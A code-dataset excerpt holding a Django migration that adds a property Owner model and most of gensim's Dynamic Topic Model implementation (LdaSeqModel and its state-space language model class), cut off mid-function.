id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3526244 | <reponame>Rostwik/real_estate_agency-master<gh_stars>0
# Generated by Django 2.2.24 on 2022-03-18 10:39
from django.db import migrations, models
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
('property', '0009_auto_20220206_2022'),
]
operations = [
migrations.AlterField(
model_name='flat',
name='owner_pure_phone',
field=phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, verbose_name='Нормализованный номер владельца'),
),
migrations.CreateModel(
name='Owner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owner', models.CharField(max_length=200, verbose_name='ФИО владельца')),
('owners_phonenumber', models.CharField(max_length=20, verbose_name='Номер владельца')),
('owner_pure_phone', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, verbose_name='Нормализованный номер владельца')),
('owner_apartments', models.ManyToManyField(related_name='owners', to='property.Flat', verbose_name='Квартира, на которую пожаловались')),
],
),
]
| StarcoderdataPython |
1822446 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
# Based on Copyright (C) 2016 <NAME> <<EMAIL>>
"""Lda Sequence model, inspired by `<NAME>, <NAME>: "Dynamic Topic Models"
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_ .
The original C/C++ implementation can be found on `blei-lab/dtm <https://github.com/blei-lab/dtm>`.
TODO: The next steps to take this forward would be:
#. Include DIM mode. Most of the infrastructure for this is in place.
#. See if LdaPost can be replaced by LdaModel completely without breaking anything.
#. Heavy lifting going on in the Sslm class - efforts can be made to cythonise mathematical methods, in particular,
update_obs and the optimization takes a lot time.
#. Try and make it distributed, especially around the E and M step.
#. Remove all C/C++ coding style/syntax.
Examples
--------
Set up a model using have 30 documents, with 5 in the first time-slice, 10 in the second, and 15 in the third
>>> from gensim.test.utils import common_corpus
>>> from gensim.models import LdaSeqModel
>>>
>>> ldaseq = LdaSeqModel(corpus=common_corpus, time_slice=[2, 4, 3], num_topics=2, chunksize=1)
Persist a model to disk and reload it later
>>> from gensim.test.utils import datapath
>>>
>>> temp_file = datapath("model")
>>> ldaseq.save(temp_file)
>>>
>>> # Load a potentially pre-trained model from disk.
>>> ldaseq = LdaSeqModel.load(temp_file)
Access the document embeddings generated from the DTM
>>> doc = common_corpus[1]
>>>
>>> embedding = ldaseq[doc]
"""
from gensim import utils, matutils
from gensim.models import ldamodel
import numpy as np
from scipy.special import digamma, gammaln
from scipy import optimize
import logging
logger = logging.getLogger(__name__)
class LdaSeqModel(utils.SaveLoad):
"""Estimate Dynamic Topic Model parameters based on a training corpus."""
def __init__(self, corpus=None, time_slice=None, id2word=None, alphas=0.01, num_topics=10,
initialize='gensim', sstats=None, lda_model=None, obs_variance=0.5, chain_variance=0.005, passes=10,
random_state=None, lda_inference_max_iter=25, em_min_iter=6, em_max_iter=20, chunksize=100):
"""
Parameters
----------
corpus : {iterable of list of (int, float), scipy.sparse.csc}, optional
Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
If not given, the model is left untrained (presumably because you want to call
:meth:`~gensim.models.ldamodel.LdaSeqModel.update` manually).
time_slice : list of int, optional
Number of documents in each time-slice. Each time slice could for example represent a year's published
papers, in case the corpus comes from a journal publishing over multiple years.
It is asummed that `sum(time_slice) == num_topics`.
id2word : dict of (int, str), optional
Mapping from word IDs to words. It is used to determine the vocabulary size, as well as for
debugging and topic printing.
alphas : float, optional
The prior probability for the model.
num_topics : int, optional
The number of requested latent topics to be extracted from the training corpus.
initialize : {'gensim', 'own', 'ldamodel'}, optional
Controls the initialization of the DTM model. Supports three different modes:
* 'gensim': Uses gensim's LDA initialization.
* 'own': Uses your own initialization matrix of an LDA model that has been previously trained.
* 'lda_model': Use a previously used LDA model, passing it through the `lda_model` argument.
sstats : numpy.ndarray , optional
Sufficient statistics used for initializing the model if `initialize == 'own'`. Corresponds to matrix
beta in the linked paper for time slice 0, expected shape (`self.vocab_len`, `num_topics`).
lda_model : :class:`~gensim.models.ldamodel.LdaModel`
Model whose sufficient statistics will be used to initialize the current object if `initialize == 'gensim'`.
obs_variance : float, optional
Observed variance used to approximate the true and forward variance as shown in
`<NAME>, <NAME>: "Dynamic Topic Models"
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
chain_variance : float, optional
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
passes : int, optional
Number of passes over the corpus for the initial :class:`~gensim.models.ldamodel.LdaModel`
random_state : {numpy.random.RandomState, int}, optional
Can be a np.random.RandomState object, or the seed to generate one. Used for reproducibility of results.
lda_inference_max_iter : int, optional
Maximum number of iterations in the inference step of the LDA training.
em_min_iter : int, optional
Minimum number of iterations until converge of the Expectation-Maximization algorithm
em_max_iter : int, optional
Maximum number of iterations until converge of the Expectation-Maximization algorithm.
chunksize : int, optional
Number of documents in the corpus do be processed in in a chunk.
"""
self.id2word = id2word
if corpus is None and self.id2word is None:
raise ValueError(
'at least one of corpus/id2word must be specified, to establish input space dimensionality'
)
if self.id2word is None:
logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
self.id2word = utils.dict_from_corpus(corpus)
self.vocab_len = len(self.id2word)
elif len(self.id2word) > 0:
self.vocab_len = len(self.id2word)
else:
self.vocab_len = 0
if corpus is not None:
try:
self.corpus_len = len(corpus)
except TypeError:
logger.warning("input corpus stream has no len(); counting documents")
self.corpus_len = sum(1 for _ in corpus)
self.time_slice = time_slice
if self.time_slice is not None:
self.num_time_slices = len(time_slice)
max_doc_len = 0
for line_no, line in enumerate(corpus):
if len(line) > max_doc_len:
max_doc_len = len(line)
self.max_doc_len = max_doc_len
self.num_topics = num_topics
self.num_time_slices = len(time_slice)
self.alphas = np.full(num_topics, alphas)
# topic_chains contains for each topic a 'state space language model' object
# which in turn has information about each topic
# the sslm class is described below and contains information
# on topic-word probabilities and doc-topic probabilities.
self.topic_chains = []
for topic in range(0, num_topics):
sslm_ = sslm(
num_time_slices=self.num_time_slices, vocab_len=self.vocab_len, num_topics=self.num_topics,
chain_variance=chain_variance, obs_variance=obs_variance
)
self.topic_chains.append(sslm_)
# the following are class variables which are to be integrated during Document Influence Model
self.top_doc_phis = None
self.influence = None
self.renormalized_influence = None
self.influence_sum_lgl = None
# if a corpus and time_slice is provided, depending on the user choice of initializing LDA, we start DTM.
if corpus is not None and time_slice is not None:
if initialize == 'gensim':
lda_model = ldamodel.LdaModel(
corpus, id2word=self.id2word, num_topics=self.num_topics,
passes=passes, alpha=self.alphas, random_state=random_state,
dtype=np.float64
)
self.sstats = np.transpose(lda_model.state.sstats)
if initialize == 'ldamodel':
self.sstats = np.transpose(lda_model.state.sstats)
if initialize == 'own':
self.sstats = sstats
# initialize model from sstats
self.init_ldaseq_ss(chain_variance, obs_variance, self.alphas, self.sstats)
# fit DTM
self.fit_lda_seq(corpus, lda_inference_max_iter, em_min_iter, em_max_iter, chunksize)
def init_ldaseq_ss(self, topic_chain_variance, topic_obs_variance, alpha, init_suffstats):
"""Initialize State Space Language Model, topic-wise.
Parameters
----------
topic_chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve.
topic_obs_variance : float
Observed variance used to approximate the true and forward variance as shown in
`<NAME>, <NAME>: "Dynamic Topic Models"
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
alpha : float
The prior probability for the model.
init_suffstats : numpy.ndarray
Sufficient statistics used for initializing the model, expected shape (`self.vocab_len`, `num_topics`).
"""
self.alphas = alpha
for k, chain in enumerate(self.topic_chains):
sstats = init_suffstats[:, k]
sslm.sslm_counts_init(chain, topic_obs_variance, topic_chain_variance, sstats)
# initialize the below matrices only if running DIM
# ldaseq.topic_chains[k].w_phi_l = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))
# ldaseq.topic_chains[k].w_phi_sum = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))
# ldaseq.topic_chains[k].w_phi_sq = np.zeros((ldaseq.vocab_len, ldaseq.num_time_slices))
def fit_lda_seq(self, corpus, lda_inference_max_iter, em_min_iter, em_max_iter, chunksize):
"""Fit a LDA Sequence model (DTM).
This method will iteratively setup LDA models and perform EM steps until the sufficient statistics convergence,
or until the maximum number of iterations is reached. Because the true posterior is intractable, an
appropriately tight lower bound must be used instead. This function will optimize this bound, by minimizing
its true Kullback-Liebler Divergence with the true posterior.
Parameters
----------
corpus : {iterable of list of (int, float), scipy.sparse.csc}
Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
lda_inference_max_iter : int
Maximum number of iterations for the inference step of LDA.
em_min_iter : int
Minimum number of time slices to be inspected.
em_max_iter : int
Maximum number of time slices to be inspected.
chunksize : int
Number of documents to be processed in each chunk.
Returns
-------
float
The highest lower bound for the true posterior produced after all iterations.
"""
LDASQE_EM_THRESHOLD = 1e-4
# if bound is low, then we increase iterations.
LOWER_ITER = 10
ITER_MULT_LOW = 2
MAX_ITER = 500
num_topics = self.num_topics
vocab_len = self.vocab_len
data_len = self.num_time_slices
corpus_len = self.corpus_len
bound = 0
convergence = LDASQE_EM_THRESHOLD + 1
iter_ = 0
while iter_ < em_min_iter or ((convergence > LDASQE_EM_THRESHOLD) and iter_ <= em_max_iter):
logger.info(" EM iter %i", iter_)
logger.info("E Step")
# TODO: bound is initialized to 0
old_bound = bound
# initiate sufficient statistics
topic_suffstats = []
for topic in range(0, num_topics):
topic_suffstats.append(np.resize(np.zeros(vocab_len * data_len), (vocab_len, data_len)))
# set up variables
gammas = np.resize(np.zeros(corpus_len * num_topics), (corpus_len, num_topics))
lhoods = np.resize(np.zeros(corpus_len * num_topics + 1), (corpus_len, num_topics + 1))
# compute the likelihood of a sequential corpus under an LDA
# seq model and find the evidence lower bound. This is the E - Step
bound, gammas = \
self.lda_seq_infer(corpus, topic_suffstats, gammas, lhoods, iter_, lda_inference_max_iter, chunksize)
self.gammas = gammas
logger.info("M Step")
# fit the variational distribution. This is the M - Step
topic_bound = self.fit_lda_seq_topics(topic_suffstats)
bound += topic_bound
if (bound - old_bound) < 0:
# if max_iter is too low, increase iterations.
if lda_inference_max_iter < LOWER_ITER:
lda_inference_max_iter *= ITER_MULT_LOW
logger.info("Bound went down, increasing iterations to %i", lda_inference_max_iter)
# check for convergence
convergence = np.fabs((bound - old_bound) / old_bound)
if convergence < LDASQE_EM_THRESHOLD:
lda_inference_max_iter = MAX_ITER
logger.info("Starting final iterations, max iter is %i", lda_inference_max_iter)
convergence = 1.0
logger.info("iteration %i iteration lda seq bound is %f convergence is %f", iter_, bound, convergence)
iter_ += 1
return bound
def lda_seq_infer(self, corpus, topic_suffstats, gammas, lhoods,
iter_, lda_inference_max_iter, chunksize):
"""Inference (or E-step) for the lower bound EM optimization.
This is used to set up the gensim :class:`~gensim.models.ldamodel.LdaModel` to be used for each time-slice.
It also allows for Document Influence Model code to be written in.
Parameters
----------
corpus : {iterable of list of (int, float), scipy.sparse.csc}
Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
topic_suffstats : numpy.ndarray
Sufficient statistics for time slice 0, used for initializing the model if `initialize == 'own'`,
expected shape (`self.vocab_len`, `num_topics`).
gammas : numpy.ndarray
Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
lhoods : list of float
The total log probability lower bound for each topic. Corresponds to the phi variational parameters in the
linked paper.
iter_ : int
Current iteration.
lda_inference_max_iter : int
Maximum number of iterations for the inference step of LDA.
chunksize : int
Number of documents to be processed in each chunk.
Returns
-------
(float, list of float)
The first value is the highest lower bound for the true posterior.
The second value is the list of optimized dirichlet variational parameters for the approximation of
the posterior.
"""
num_topics = self.num_topics
vocab_len = self.vocab_len
bound = 0.0
lda = ldamodel.LdaModel(num_topics=num_topics, alpha=self.alphas, id2word=self.id2word, dtype=np.float64)
lda.topics = np.array(np.split(np.zeros(vocab_len * num_topics), vocab_len))
ldapost = LdaPost(max_doc_len=self.max_doc_len, num_topics=num_topics, lda=lda)
model = "DTM"
if model == "DTM":
bound, gammas = self.inferDTMseq(
corpus, topic_suffstats, gammas, lhoods, lda,
ldapost, iter_, bound, lda_inference_max_iter, chunksize
)
elif model == "DIM":
self.InfluenceTotalFixed(corpus)
bound, gammas = self.inferDIMseq(
corpus, topic_suffstats, gammas, lhoods, lda,
ldapost, iter_, bound, lda_inference_max_iter, chunksize
)
return bound, gammas
def inferDTMseq(self, corpus, topic_suffstats, gammas, lhoods, lda,
ldapost, iter_, bound, lda_inference_max_iter, chunksize):
"""Compute the likelihood of a sequential corpus under an LDA seq model, and reports the likelihood bound.
Parameters
----------
corpus : {iterable of list of (int, float), scipy.sparse.csc}
Stream of document vectors or sparse matrix of shape (`num_terms`, `num_documents`).
topic_suffstats : numpy.ndarray
Sufficient statistics of the current model, expected shape (`self.vocab_len`, `num_topics`).
gammas : numpy.ndarray
Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
lhoods : list of float of length `self.num_topics`
The total log probability bound for each topic. Corresponds to phi from the linked paper.
lda : :class:`~gensim.models.ldamodel.LdaModel`
The trained LDA model of the previous iteration.
ldapost : :class:`~gensim.models.ldaseqmodel.LdaPost`
Posterior probability variables for the given LDA model. This will be used as the true (but intractable)
posterior.
iter_ : int
The current iteration.
bound : float
The LDA bound produced after all iterations.
lda_inference_max_iter : int
Maximum number of iterations for the inference step of LDA.
chunksize : int
Number of documents to be processed in each chunk.
Returns
-------
(float, list of float)
The first value is the highest lower bound for the true posterior.
The second value is the list of optimized dirichlet variational parameters for the approximation of
the posterior.
"""
doc_index = 0 # overall doc_index in corpus
time = 0 # current time-slice
doc_num = 0 # doc-index in current time-slice
lda = self.make_lda_seq_slice(lda, time) # create lda_seq slice
time_slice = np.cumsum(np.array(self.time_slice))
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
# iterates chunk size for constant memory footprint
for doc in chunk:
# this is used to update the time_slice and create a new lda_seq slice every new time_slice
if doc_index > time_slice[time]:
time += 1
lda = self.make_lda_seq_slice(lda, time) # create lda_seq slice
doc_num = 0
gam = gammas[doc_index]
lhood = lhoods[doc_index]
ldapost.gamma = gam
ldapost.lhood = lhood
ldapost.doc = doc
# TODO: replace fit_lda_post with appropriate ldamodel functions, if possible.
if iter_ == 0:
doc_lhood = LdaPost.fit_lda_post(
ldapost, doc_num, time, None, lda_inference_max_iter=lda_inference_max_iter
)
else:
doc_lhood = LdaPost.fit_lda_post(
ldapost, doc_num, time, self, lda_inference_max_iter=lda_inference_max_iter
)
if topic_suffstats is not None:
topic_suffstats = LdaPost.update_lda_seq_ss(ldapost, time, doc, topic_suffstats)
gammas[doc_index] = ldapost.gamma
bound += doc_lhood
doc_index += 1
doc_num += 1
return bound, gammas
def make_lda_seq_slice(self, lda, time):
"""Update the LDA model topic-word values using time slices.
Parameters
----------
lda : :class:`~gensim.models.ldamodel.LdaModel`
The stationary model to be updated
time : int
The time slice assigned to the stationary model.
Returns
-------
lda : :class:`~gensim.models.ldamodel.LdaModel`
The stationary model updated to reflect the passed time slice.
"""
for k in range(0, self.num_topics):
lda.topics[:, k] = np.copy(self.topic_chains[k].e_log_prob[:, time])
lda.alpha = np.copy(self.alphas)
return lda
def fit_lda_seq_topics(self, topic_suffstats):
"""Fit the sequential model topic-wise.
Parameters
----------
topic_suffstats : numpy.ndarray
Sufficient statistics of the current model, expected shape (`self.vocab_len`, `num_topics`).
Returns
-------
float
The sum of the optimized lower bounds for all topics.
"""
lhood = 0
for k, chain in enumerate(self.topic_chains):
logger.info("Fitting topic number %i", k)
lhood_term = sslm.fit_sslm(chain, topic_suffstats[k])
lhood += lhood_term
return lhood
def print_topic_times(self, topic, top_terms=20):
"""Get the most relevant words for a topic, for each timeslice. This can be used to inspect the evolution of a
topic through time.
Parameters
----------
topic : int
The index of the topic.
top_terms : int, optional
Number of most relevant words associated with the topic to be returned.
Returns
-------
list of list of str
Top `top_terms` relevant terms for the topic for each time slice.
"""
topics = []
for time in range(0, self.num_time_slices):
topics.append(self.print_topic(topic, time, top_terms))
return topics
def print_topics(self, time=0, top_terms=20):
"""Get the most relevant words for every topic.
Parameters
----------
time : int, optional
The time slice in which we are interested in (since topics evolve over time, it is expected that the most
relevant words will also gradually change).
top_terms : int, optional
Number of most relevant words to be returned for each topic.
Returns
-------
list of list of (str, float)
Representation of all topics. Each of them is represented by a list of pairs of words and their assigned
probability.
"""
return [self.print_topic(topic, time, top_terms) for topic in range(0, self.num_topics)]
def print_topic(self, topic, time=0, top_terms=20):
"""Get the list of words most relevant to the given topic.
Parameters
----------
topic : int
The index of the topic to be inspected.
time : int, optional
The time slice in which we are interested in (since topics evolve over time, it is expected that the most
relevant words will also gradually change).
top_terms : int, optional
Number of words associated with the topic to be returned.
Returns
-------
list of (str, float)
The representation of this topic. Each element in the list includes the word itself, along with the
probability assigned to it by the topic.
"""
topic = self.topic_chains[topic].e_log_prob
topic = np.transpose(topic)
topic = np.exp(topic[time])
topic = topic / topic.sum()
bestn = matutils.argsort(topic, top_terms, reverse=True)
beststr = [(self.id2word[id_], topic[id_]) for id_ in bestn]
return beststr
def doc_topics(self, doc_number):
"""Get the topic mixture for a document.
Uses the priors for the dirichlet distribution that approximates the true posterior with the optimal
lower bound, and therefore requires the model to be already trained.
Parameters
----------
doc_number : int
Index of the document for which the mixture is returned.
Returns
-------
list of length `self.num_topics`
Probability for each topic in the mixture (essentially a point in the `self.num_topics - 1` simplex.
"""
doc_topic = np.copy(self.gammas)
doc_topic /= doc_topic.sum(axis=1)[:, np.newaxis]
return doc_topic[doc_number]
def dtm_vis(self, time, corpus):
"""Get the information needed to visualize the corpus model at a given time slice, using the pyLDAvis format.
Parameters
----------
time : int
The time slice we are interested in.
corpus : {iterable of list of (int, float), scipy.sparse.csc}, optional
The corpus we want to visualize at the given time slice.
Returns
-------
doc_topics : list of length `self.num_topics`
Probability for each topic in the mixture (essentially a point in the `self.num_topics - 1` simplex.
topic_term : numpy.ndarray
The representation of each topic as a multinomial over words in the vocabulary,
expected shape (`num_topics`, vocabulary length).
doc_lengths : list of int
The number of words in each document. These could be fixed, or drawn from a Poisson distribution.
term_frequency : numpy.ndarray
The term frequency matrix (denoted as beta in the original Blei paper). This could also be the TF-IDF
representation of the corpus, expected shape (number of documents, length of vocabulary).
vocab : list of str
The set of unique terms existing in the cropuse's vocabulary.
"""
doc_topic = np.copy(self.gammas)
doc_topic /= doc_topic.sum(axis=1)[:, np.newaxis]
topic_term = [
np.exp(np.transpose(chain.e_log_prob)[time]) / np.exp(np.transpose(chain.e_log_prob)[time]).sum()
for k, chain in enumerate(self.topic_chains)
]
doc_lengths = [len(doc) for doc_no, doc in enumerate(corpus)]
term_frequency = np.zeros(self.vocab_len)
for doc_no, doc in enumerate(corpus):
for pair in doc:
term_frequency[pair[0]] += pair[1]
vocab = [self.id2word[i] for i in range(0, len(self.id2word))]
return doc_topic, np.array(topic_term), doc_lengths, term_frequency, vocab
def dtm_coherence(self, time):
"""Get the coherence for each topic.
Can be used to measure the quality of the model, or to inspect the convergence through training via a callback.
Parameters
----------
time : int
The time slice.
Returns
-------
list of list of str
The word representation for each topic, for each time slice. This can be used to check the time coherence
of topics as time evolves: If the most relevant words remain the same then the topic has somehow
converged or is relatively static, if they change rapidly the topic is evolving.
"""
coherence_topics = []
for topics in self.print_topics(time):
coherence_topic = []
for word, dist in topics:
coherence_topic.append(word)
coherence_topics.append(coherence_topic)
return coherence_topics
def __getitem__(self, doc):
"""Get the topic mixture for the given document, using the inferred approximation of the true posterior.
Parameters
----------
doc : list of (int, float)
The doc in BOW format. Can be an unseen document.
Returns
-------
list of float
Probabilities for each topic in the mixture. This is essentially a point in the `num_topics - 1` simplex.
"""
lda_model = \
ldamodel.LdaModel(num_topics=self.num_topics, alpha=self.alphas, id2word=self.id2word, dtype=np.float64)
lda_model.topics = np.array(np.split(np.zeros(self.vocab_len * self.num_topics), self.vocab_len))
ldapost = LdaPost(num_topics=self.num_topics, max_doc_len=len(doc), lda=lda_model, doc=doc)
time_lhoods = []
for time in range(0, self.num_time_slices):
lda_model = self.make_lda_seq_slice(lda_model, time) # create lda_seq slice
lhood = LdaPost.fit_lda_post(ldapost, 0, time, self)
time_lhoods.append(lhood)
doc_topic = ldapost.gamma / ldapost.gamma.sum()
# should even the likelihoods be returned?
return doc_topic
class sslm(utils.SaveLoad):
"""Encapsulate the inner State Space Language Model for DTM.
Some important attributes of this class:
* `obs` is a matrix containing the document to topic ratios.
* `e_log_prob` is a matrix containing the topic to word ratios.
* `mean` contains the mean values to be used for inference for each word for a time slice.
* `variance` contains the variance values to be used for inference of word in a time slice.
* `fwd_mean` and`fwd_variance` are the forward posterior values for the mean and the variance.
* `zeta` is an extra variational parameter with a value for each time slice.
"""
def __init__(self, vocab_len=None, num_time_slices=None, num_topics=None, obs_variance=0.5, chain_variance=0.005):
self.vocab_len = vocab_len
self.num_time_slices = num_time_slices
self.obs_variance = obs_variance
self.chain_variance = chain_variance
self.num_topics = num_topics
# setting up matrices
self.obs = np.array(np.split(np.zeros(num_time_slices * vocab_len), vocab_len))
self.e_log_prob = np.array(np.split(np.zeros(num_time_slices * vocab_len), vocab_len))
self.mean = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.fwd_mean = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.fwd_variance = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.variance = np.array(np.split(np.zeros((num_time_slices + 1) * vocab_len), vocab_len))
self.zeta = np.zeros(num_time_slices)
# the following are class variables which are to be integrated during Document Influence Model
self.m_update_coeff = None
self.mean_t = None
self.variance_t = None
self.influence_sum_lgl = None
self.w_phi_l = None
self.w_phi_sum = None
self.w_phi_l_sq = None
self.m_update_coeff_g = None
def update_zeta(self):
"""Update the Zeta variational parameter.
Zeta is described in the appendix and is equal to sum (exp(mean[word] + Variance[word] / 2)),
over every time-slice. It is the value of variational parameter zeta which maximizes the lower bound.
Returns
-------
list of float
The updated zeta values for each time slice.
"""
for j, val in enumerate(self.zeta):
self.zeta[j] = np.sum(np.exp(self.mean[:, j + 1] + self.variance[:, j + 1] / 2))
return self.zeta
def compute_post_variance(self, word, chain_variance):
"""Get the variance, based on the `Variational Kalman Filtering approach for Approximate Inference (section 3.1)
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
This function accepts the word to compute variance for, along with the associated sslm class object,
and returns the `variance` and the posterior approximation `fwd_variance`.
Notes
-----
This function essentially computes Var[\beta_{t,w}] for t = 1:T
.. :math::
fwd\_variance[t] \equiv E((beta_{t,w}-mean_{t,w})^2 |beta_{t}\ for\ 1:t) =
(obs\_variance / fwd\_variance[t - 1] + chain\_variance + obs\_variance ) *
(fwd\_variance[t - 1] + obs\_variance)
.. :math::
variance[t] \equiv E((beta_{t,w}-mean\_cap_{t,w})^2 |beta\_cap_{t}\ for\ 1:t) =
fwd\_variance[t - 1] + (fwd\_variance[t - 1] / fwd\_variance[t - 1] + obs\_variance)^2 *
(variance[t - 1] - (fwd\_variance[t-1] + obs\_variance))
Parameters
----------
word: int
The word's ID.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
Returns
-------
(numpy.ndarray, numpy.ndarray)
The first returned value is the variance of each word in each time slice, the second value is the
inferred posterior variance for the same pairs.
"""
INIT_VARIANCE_CONST = 1000
T = self.num_time_slices
variance = self.variance[word]
fwd_variance = self.fwd_variance[word]
# forward pass. Set initial variance very high
fwd_variance[0] = chain_variance * INIT_VARIANCE_CONST
for t in range(1, T + 1):
if self.obs_variance:
c = self.obs_variance / (fwd_variance[t - 1] + chain_variance + self.obs_variance)
else:
c = 0
fwd_variance[t] = c * (fwd_variance[t - 1] + chain_variance)
# backward pass
variance[T] = fwd_variance[T]
for t in range(T - 1, -1, -1):
if fwd_variance[t] > 0.0:
c = np.power((fwd_variance[t] / (fwd_variance[t] + chain_variance)), 2)
else:
c = 0
variance[t] = (c * (variance[t + 1] - chain_variance)) + ((1 - c) * fwd_variance[t])
return variance, fwd_variance
def compute_post_mean(self, word, chain_variance):
"""Get the mean, based on the `Variational Kalman Filtering approach for Approximate Inference (section 3.1)
<https://mimno.infosci.cornell.edu/info6150/readings/dynamic_topic_models.pdf>`_.
Notes
-----
This function essentially computes E[\beta_{t,w}] for t = 1:T.
.. :math::
Fwd_Mean(t) ≡ E(beta_{t,w} | beta_ˆ 1:t )
= (obs_variance / fwd_variance[t - 1] + chain_variance + obs_variance ) * fwd_mean[t - 1] +
(1 - (obs_variance / fwd_variance[t - 1] + chain_variance + obs_variance)) * beta
.. :math::
Mean(t) ≡ E(beta_{t,w} | beta_ˆ 1:T )
= fwd_mean[t - 1] + (obs_variance / fwd_variance[t - 1] + obs_variance) +
(1 - obs_variance / fwd_variance[t - 1] + obs_variance)) * mean[t]
Parameters
----------
word: int
The word's ID.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
Returns
-------
(numpy.ndarray, numpy.ndarray)
The first returned value is the mean of each word in each time slice, the second value is the
inferred posterior mean for the same pairs.
"""
T = self.num_time_slices
obs = self.obs[word]
fwd_variance = self.fwd_variance[word]
mean = self.mean[word]
fwd_mean = self.fwd_mean[word]
# forward
fwd_mean[0] = 0
for t in range(1, T + 1):
c = self.obs_variance / (fwd_variance[t - 1] + chain_variance + self.obs_variance)
fwd_mean[t] = c * fwd_mean[t - 1] + (1 - c) * obs[t - 1]
# backward pass
mean[T] = fwd_mean[T]
for t in range(T - 1, -1, -1):
if chain_variance == 0.0:
c = 0.0
else:
c = chain_variance / (fwd_variance[t] + chain_variance)
mean[t] = c * fwd_mean[t] + (1 - c) * mean[t + 1]
return mean, fwd_mean
def compute_expected_log_prob(self):
"""Compute the expected log probability given values of m.
The appendix describes the Expectation of log-probabilities in equation 5 of the DTM paper;
The below implementation is the result of solving the equation and is implemented as in the original
Blei DTM code.
Returns
-------
numpy.ndarray of float
The expected value for the log probabilities for each word and time slice.
"""
for (w, t), val in np.ndenumerate(self.e_log_prob):
self.e_log_prob[w][t] = self.mean[w][t + 1] - np.log(self.zeta[t])
return self.e_log_prob
def sslm_counts_init(self, obs_variance, chain_variance, sstats):
"""Initialize the State Space Language Model with LDA sufficient statistics.
Called for each topic-chain and initializes initial mean, variance and Topic-Word probabilities
for the first time-slice.
Parameters
----------
obs_variance : float, optional
Observed variance used to approximate the true and forward variance.
chain_variance : float
Gaussian parameter defined in the beta distribution to dictate how the beta values evolve over time.
sstats : numpy.ndarray
Sufficient statistics of the LDA model. Corresponds to matrix beta in the linked paper for time slice 0,
expected shape (`self.vocab_len`, `num_topics`).
"""
W = self.vocab_len
T = self.num_time_slices
log_norm_counts = np.copy(sstats)
log_norm_counts = log_norm_counts / sum(log_norm_counts)
log_norm_counts = log_norm_counts + 1.0 / W
log_norm_counts = log_norm_counts / sum(log_norm_counts)
log_norm_counts = np.log(log_norm_counts)
# setting variational observations to transformed counts
self.obs = (np.repeat(log_norm_counts, T, axis=0)).reshape(W, T)
# set variational parameters
self.obs_variance = obs_variance
self.chain_variance = chain_variance
# compute post variance, mean
for w in range(0, W):
self.variance[w], self.fwd_variance[w] = self.compute_post_variance(w, self.chain_variance)
self.mean[w], self.fwd_mean[w] = self.compute_post_mean(w, self.chain_variance)
self.zeta = self.update_zeta()
self.e_log_prob = self.compute_expected_log_prob()
def fit_sslm(self, sstats):
"""Fits variational distribution.
This is essentially the m-step.
Maximizes the approximation of the true posterior for a particular topic using the provided sufficient
statistics. Updates the values using :meth:`~gensim.models.ldaseqmodel.sslm.update_obs` and
:meth:`~gensim.models.ldaseqmodel.sslm.compute_expected_log_prob`.
Parameters
----------
sstats : numpy.ndarray
Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the
current time slice, expected shape (`self.vocab_len`, `num_topics`).
Returns
-------
float
The lower bound for the true posterior achieved using the fitted approximate distribution.
"""
W = self.vocab_len
bound = 0
old_bound = 0
sslm_fit_threshold = 1e-6
sslm_max_iter = 2
converged = sslm_fit_threshold + 1
# computing variance, fwd_variance
self.variance, self.fwd_variance = \
(np.array(x) for x in list(zip(*[self.compute_post_variance(w, self.chain_variance) for w in range(0, W)])))
# column sum of sstats
totals = sstats.sum(axis=0)
iter_ = 0
model = "DTM"
if model == "DTM":
bound = self.compute_bound(sstats, totals)
if model == "DIM":
bound = self.compute_bound_fixed(sstats, totals)
logger.info("initial sslm bound is %f", bound)
while converged > sslm_fit_threshold and iter_ < sslm_max_iter:
iter_ += 1
old_bound = bound
self.obs, self.zeta = self.update_obs(sstats, totals)
if model == "DTM":
bound = self.compute_bound(sstats, totals)
if model == "DIM":
bound = self.compute_bound_fixed(sstats, totals)
converged = np.fabs((bound - old_bound) / old_bound)
logger.info("iteration %i iteration lda seq bound is %f convergence is %f", iter_, bound, converged)
self.e_log_prob = self.compute_expected_log_prob()
return bound
def compute_bound(self, sstats, totals):
"""Compute the maximized lower bound achieved for the log probability of the true posterior.
Uses the formula presented in the appendix of the DTM paper (formula no. 5).
Parameters
----------
sstats : numpy.ndarray
Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the first
time slice, expected shape (`self.vocab_len`, `num_topics`).
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
Returns
-------
float
The maximized lower bound.
"""
w = self.vocab_len
t = self.num_time_slices
term_1 = 0
term_2 = 0
term_3 = 0
val = 0
ent = 0
chain_variance = self.chain_variance
# computing mean, fwd_mean
self.mean, self.fwd_mean = \
